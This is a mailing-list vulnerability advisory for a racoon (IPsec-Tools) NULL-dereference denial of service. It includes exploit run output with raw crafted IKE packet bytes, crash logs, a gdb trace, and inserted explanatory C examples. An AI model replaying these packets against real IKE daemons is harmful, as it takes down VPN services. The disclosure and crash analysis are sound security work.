Message-Id: <20150519203220.D45711380D0@mail.altsci.com>
Date: Tue, 19 May 2015 13:32:20 -0700 (PDT)
From: Javantea <jvoss@...sci.com>
To: fulldisclosure@...lists.org
Subject: [FD] 0-day Denial of Service in IPsec-Tools
Denial of Service in IPsec-Tools
Vulnerability Report
May 19, 2015
Product: IPsec-Tools
Version: 0.8.2
Website: http://ipsec-tools.sourceforge.net/
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
IPsec-Tools is vulnerable to a 0-day exploit that I made available yesterday. It is a null dereference crash in racoon in gssapi.c. It requires HAVE_GSSAPI to be set, which is a configuration option. The impact is a denial of service against the IKE daemon. Because IPsec is critical infrastructure and this attack requires two UDP packets, it deserves a medium rating. This denial of service violates the premise that IPsec's security is built upon. More information about the impact can be found on my website linked below.
If you're running IPsec-Tools, replace it sensibly as soon as possible. The reason this exploit is being released without a patch on Full Disclosure is because the authors have apparently abandoned the software.
The vulnerability:
racoon/gssapi.c:205:static int gssapi_init(struct ph1handle *iph1)
if (iph1->rmconf->proposal->gssid != NULL) {
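The pattern behind the crash, as an added example that is not IPsec-Tools code: the quoted line walks iph1->rmconf->proposal->gssid in one expression, so if any link of that chain is NULL the daemon reads through a small address and dies (the kernel line further down shows exactly such a read, at 0x100). The struct and member names below follow the advisory's snippet; their layouts, the result codes and the sample handles are assumptions made up for the example.

```c
/* Added example (not IPsec-Tools code): a defensive form of the chained
 * dereference iph1->rmconf->proposal->gssid quoted from gssapi.c.
 * Struct names follow the advisory; the layouts are simplified assumptions. */
#include <stddef.h>
#include <stdio.h>

struct isakmpsa {                 /* stands in for racoon's proposal (assumed layout) */
    const char *gssid;            /* GSS-API identity; NULL is a legitimate value here */
};

struct remoteconf {               /* stands in for rmconf (assumed layout) */
    struct isakmpsa *proposal;
};

struct ph1handle {                /* stands in for the phase-1 handle (assumed layout) */
    struct remoteconf *rmconf;
};

/* Result codes for the checked walk (assumed; racoon itself returns plain ints). */
enum gssapi_init_result {
    GSSAPI_INIT_OK = 0,           /* every link present; *has_gssid is valid */
    GSSAPI_INIT_NO_RMCONF = -1,   /* handle has no remote configuration */
    GSSAPI_INIT_NO_PROPOSAL = -2  /* remote configuration carries no proposal */
};

/* Walk the chain one link at a time.  A NULL link becomes a refused
 * negotiation for this peer, logged with the link that was missing,
 * instead of a read through NULL plus a member offset. */
static int gssapi_init_checked(const struct ph1handle *iph1, int *has_gssid)
{
    if (iph1 == NULL || iph1->rmconf == NULL) {
        fprintf(stderr, "gssapi_init: no remote configuration for peer\n");
        return GSSAPI_INIT_NO_RMCONF;
    }
    if (iph1->rmconf->proposal == NULL) {
        fprintf(stderr, "gssapi_init: remote configuration has no proposal\n");
        return GSSAPI_INIT_NO_PROPOSAL;
    }
    *has_gssid = (iph1->rmconf->proposal->gssid != NULL);
    return GSSAPI_INIT_OK;
}

/* Constructed handles covering the four states the walk can meet. */
static struct isakmpsa prop_with_id = { "gss-id-placeholder" };
static struct isakmpsa prop_without_id = { NULL };
static struct remoteconf conf_full = { &prop_with_id };
static struct remoteconf conf_no_gssid = { &prop_without_id };
static struct remoteconf conf_no_proposal = { NULL };
static struct ph1handle handle_full = { &conf_full };
static struct ph1handle handle_no_gssid = { &conf_no_gssid };
static struct ph1handle handle_no_proposal = { &conf_no_proposal };
static struct ph1handle handle_no_rmconf = { NULL };

int main(void)
{
    const struct ph1handle *cases[] = { &handle_full, &handle_no_gssid,
                                        &handle_no_proposal, &handle_no_rmconf };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        int has = -1;
        int rc = gssapi_init_checked(cases[i], &has);
        printf("case %zu: rc=%d has_gssid=%d\n", i, rc, has);
    }
    return 0;
}
```

Only the last two cases differ from the unchecked original: where the quoted line would fault, the checked walk returns a distinct error code and logs which link was missing, so the daemon stays up and the operator can see that a peer reached gssapi_init without a usable remote configuration.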
The exploit is available on my website:
https://www.altsci.com/ipsec/ipsec-tools-sa.html
Example Usage:
python3 repro_racoon_dos129.py
Warning: Unable to bind to port 500. Might not work. [Errno 13] Permission denied
Umm, okay.
129 ('\x81\xcf{r\x8e\xb6a\xdd9\xf1\x87cP\xb1\x05\xc7\x01\x10\x02\x00\x00\x00\x00\x00\x00\x00\x00\x98\r\x00\x00<\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x000\x01\x01\x00\x01\x00\x00\x00(\x01\x01\x00\x00\x80\x0b\x00\x01\x00\x0c\x00\x04\x00\x01Q\x80\x80\x01\x00\x07\x80\x0e\x01\x00\x80\x03\x00\x03\x80\x02\x00\x02\x80\x04\x00\x05\r\x00\x00\x14J\x13\x1c\x81\x07\x03XE\\W(\xf2\x0e\x95E/\r\x00\x00\x14\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\x00\x00\x00\x00\x18@H\xb7\xd5n\xbc\xe8\x85%\xe7\xde\x7f\x00\xd6\xc2\xd3\x80\x00\x00\x00', ('192.168.88.247', 500))
129 sending second packet
Umm, okay.
What it looks like on the server:
sudo racoon -F -v -f server_racoon.conf >server_dos5m.txt 2>&1 &
jvoss@...ecu:~$ dmesg |tail
[ 584.440533] AVX or AES-NI instructions are not detected.
[ 584.442253] AVX or AES-NI instructions are not detected.
[ 584.490468] AVX instructions are not detected.
[13683.867215] init: upstart-udev-bridge main process (361) terminated with status 1
[13683.867223] init: upstart-udev-bridge main process ended, respawning
[13683.867307] init: upstart-file-bridge main process (452) terminated with status 1
[13683.867313] init: upstart-file-bridge main process ended, respawning
[13683.867386] init: upstart-socket-bridge main process (616) terminated with status 1
[13683.867392] init: upstart-socket-bridge main process ended, respawning
[19912.460170] racoon[3701]: segfault at 100 ip 00007fe0eba84ce7 sp 00007ffff51db730 error 4 in racoon[7fe0eba5e000+93000]
Messages printed by the daemon:
2015-04-27 15:22:14: INFO: received Vendor ID: draft-ietf-ipsec-nat-t-ike-00
2015-04-27 15:22:14: INFO: received broken Microsoft ID: FRAGMENTATION
2015-04-27 15:22:14: INFO: received Vendor ID: DPD
2015-04-27 15:22:14: [169.254.44.43] INFO: Selected NAT-T version: RFC 3947
2015-04-27 15:22:14: [169.254.44.43] ERROR: ignore the packet, received unexpecting payload type 128.
2015-04-27 15:22:14: INFO: respond new phase 1 negotiation: 169.254.88.251[500]<=>169.254.44.43[42258]
2015-04-27 15:22:14: INFO: begin Identity Protection mode.
2015-04-27 15:22:14: INFO: received Vendor ID: RFC 3947
2015-04-27 15:22:14: INFO: received Vendor ID: draft-ietf-ipsec-nat-t-ike-02
2015-04-27 15:22:14: INFO: received Vendor ID: draft-ietf-ipsec-nat-t-ike-02
2015-04-27 15:22:14: INFO: received Vendor ID: draft-ietf-ipsec-nat-t-ike-00
2015-04-27 15:22:14: INFO: received broken Microsoft ID: FRAGMENTATION
2015-04-27 15:22:14: INFO: received Vendor ID: DPD
2015-04-27 15:22:14: [169.254.44.43] INFO: Selected NAT-T version: RFC 3947
Stack trace and related debugging information (apologies for the lack of symbols):
Program received signal SIGSEGV, Segmentation fault.
0x000055555557ace7 in ?? ()
(gdb) bt
#0 0x000055555557ace7 in ?? ()
#1 0x000055555557b775 in ?? ()
#2 0x000055555556c1a1 in ?? ()
#3 0x0000555555563fd1 in ?? ()
#4 0x00005555555658ec in ?? ()
#5 0x000055555555fc9d in ?? ()
#6 0x000055555555f273 in ?? ()
#7 0x00007ffff6953ec5 in __libc_start_main (main=0x55555555f010, argc=5, argv=0x7fffffffe738, init=<optimized out>,
fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe728) at libc-start.c:287
#8 0x000055555555f3ec in ?? ()
(gdb) x/15i $rip - 12
0x55555557acdb: mov %eax,0x1c8(%rsp)
0x55555557ace2: mov 0x28(%r12),%rax
=> 0x55555557ace7: mov 0x100(%rax),%rax
0x55555557acee: mov 0x30(%rax),%rax
0x55555557acf2: test %rax,%rax
0x55555557acf5: je 0x55555557af00
0x55555557acfb: mov (%rax),%rdx
0x55555557acfe: lea 0x20(%rsp),%r13
0x55555557ad03: mov 0x8(%rax),%rax
0x55555557ad07: lea 0x1c(%rsp),%rbx
0x55555557ad0c: lea 0x30(%rsp),%rsi
0x55555557ad11: mov %r13,%rcx
0x55555557ad14: mov %rdx,0x30(%rsp)
0x55555557ad19: mov %rbx,%rdi
0x55555557ad1c: xor %edx,%edx
(gdb) i r
rax 0x0 0
rbx 0x0 0
rcx 0x5555558dbe40 93824995933760
rdx 0x5555558dbe40 93824995933760
rsi 0x0 0
rdi 0x5555558dbdc0 93824995933632
rbp 0x5555558dbdc0 0x5555558dbdc0
rsp 0x7fffffffd180 0x7fffffffd180
r8 0x5555558dbdc0 93824995933632
r9 0x7ffff6cf07b8 140737334151096
r10 0xbdb00 776960
r11 0x5555558da301 93824995926785
r12 0x5555558da300 93824995926784
r13 0x555555822460 93824995173472
r14 0x5555558da420 93824995927072
r15 0x7fffffffd260 140737488343648
rip 0x55555557ace7 0x55555557ace7
eflags 0x10206 [ PF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
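Reading the crash off the kernel line, as an added example that is not from the advisory or IPsec-Tools: the dmesg entry above carries the fault address, the instruction pointer, the page-fault error code and the mapping the instruction lives in, which is enough to classify the crash as a NULL-pointer read and to get an offset that can be looked up in a symbolised build. The sample line is the one quoted above; the error-code bit meanings are those of the x86 page-fault handler (bit 0 protection violation, bit 1 write, bit 2 user mode), and the "below one page" heuristic is the example's own.

```c
/* Added example (not from the advisory): parse the x86 kernel's segfault
 * line for a crashed daemon and classify the fault.  SAMPLE_LINE is the
 * dmesg entry quoted in the advisory; everything else is constructed. */
#include <stdio.h>
#include <string.h>

struct segv_info {
    char comm[32];                /* process name, e.g. "racoon" */
    unsigned pid;
    unsigned long long fault_addr; /* address the faulting access touched */
    unsigned long long ip;
    unsigned long long sp;
    unsigned err;                 /* x86 page-fault error code */
    unsigned long long map_base;  /* start of the mapping named in the line */
    unsigned long long map_len;
};

static const char SAMPLE_LINE[] =
    "[19912.460170] racoon[3701]: segfault at 100 ip 00007fe0eba84ce7 "
    "sp 00007ffff51db730 error 4 in racoon[7fe0eba5e000+93000]";

/* Kernel format: "comm[pid]: segfault at A ip I sp S error E in obj[base+len]",
 * optionally preceded by a "[ seconds] " dmesg timestamp.  Returns 1 on a
 * complete parse, 0 otherwise. */
static int parse_segfault_line(const char *line, struct segv_info *out)
{
    const char *p = line;
    if (*p == '[') {              /* skip the dmesg timestamp */
        const char *close = strchr(p, ']');
        if (close == NULL)
            return 0;
        p = close + 1;
        while (*p == ' ')
            p++;
    }
    char obj[64];
    int n = sscanf(p,
        "%31[^[][%u]: segfault at %llx ip %llx sp %llx error %u in %63[^[][%llx+%llx]",
        out->comm, &out->pid, &out->fault_addr, &out->ip, &out->sp,
        &out->err, obj, &out->map_base, &out->map_len);
    return n == 9;
}

/* x86 page-fault error code bits as used by the kernel's fault handler. */
enum { PF_PROT = 1, PF_WRITE = 2, PF_USER = 4 };

/* Heuristic: a user-mode read of a page that is not mapped at all, at an
 * address inside the first page, is a NULL base pointer plus a small
 * struct-member offset.  The quoted line is the textbook case: 0x100. */
static int looks_like_null_deref(const struct segv_info *s)
{
    return (s->err & PF_USER) && !(s->err & PF_PROT) && s->fault_addr < 4096;
}

/* Offset of the faulting instruction inside the named mapping; this is the
 * value to look up in a symbolised copy of the same binary. */
static unsigned long long ip_offset(const struct segv_info *s)
{
    return s->ip - s->map_base;
}

int main(void)
{
    struct segv_info s;
    if (!parse_segfault_line(SAMPLE_LINE, &s)) {
        puts("unrecognised line");
        return 1;
    }
    printf("%s pid %u: fault at 0x%llx, ip at +0x%llx in %s mapping, error %u -> %s\n",
           s.comm, s.pid, s.fault_addr, ip_offset(&s), s.comm, s.err,
           looks_like_null_deref(&s) ? "NULL-pointer pattern" : "other");
    return 0;
}
```

For the quoted line the parser yields error 4 (a user-mode read of an unmapped page), fault address 0x100 and instruction offset 0x26ce7 into the racoon mapping. That agrees with the gdb session: rax is 0 at "mov 0x100(%rax),%rax", so the base pointer being read through is NULL and 0x100 is a member offset. The gdb address 0x55555557ace7 is the same 0x26ce7 from 0x555555554000, the usual PIE load base on that platform; the session does not show its mappings, so that correspondence is an assumption.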
Tested platforms:
Ubuntu
Gentoo (USE flag kerberos)
This vulnerability affects many platforms (NetBSD and FreeBSD for example), but I did not have time to test them. If your system is running IPsec-Tools and you are not sure whether it is vulnerable, please test it.
Disclosure Timeline:
Found: Nov 2013
Reported to author: Dec 2013
Reported to author: May 2015
Full Disclosure: Mon, May 18, 2015
If anyone has questions or comments about this or related topics, feel free to contact me.
Regards,
Javantea
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/